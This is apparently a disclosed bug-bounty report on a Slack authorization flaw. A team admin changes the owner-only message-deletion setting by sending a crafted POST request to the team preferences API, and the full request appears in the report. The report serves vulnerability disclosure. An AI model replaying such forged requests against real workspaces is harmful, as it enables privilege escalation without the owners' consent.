Slack · Report #46750
Team admin can change unauthorized team setting (allow_message_deletion)
How it was found
Team admin can escalate his privileges and change 'allow_message_deletion' team setting, which can be changed only by a team owner.
Steps to reproduce:
- Log in as team admin.
- Send the below request using his cookie & token and notice that it changes 'allow_message_deletion' team setting to true.
POST /api/team.prefs.set?t=1423146704 HTTP/1.1 Host: teamname.slack.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: https://teamname.slack.com/admin/settings Cookie: _ga=GA1.2.630936366.1423056192; a-3204538285=..
prefs=%7B%22msg_edit_window_mins%22%3A%221%22%2C%22allow_message_deletion%22%3Atrue%7D&token=xoxs-xxxx&set_active=true&_attempts=1
To confirm, login as team owner. Navigate to /admin/settings#permissions, expand message editing & deletion section. Notice that 'Only administrators may delete messages' checkbox is checked.